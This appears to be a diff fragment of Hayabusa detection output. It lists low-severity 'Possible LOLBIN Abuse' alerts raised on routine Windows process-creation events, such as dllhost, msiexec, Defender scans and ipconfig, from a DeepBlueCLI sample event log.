+2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:08:53.121 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:04:56.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 04:25:27.075 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:48.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
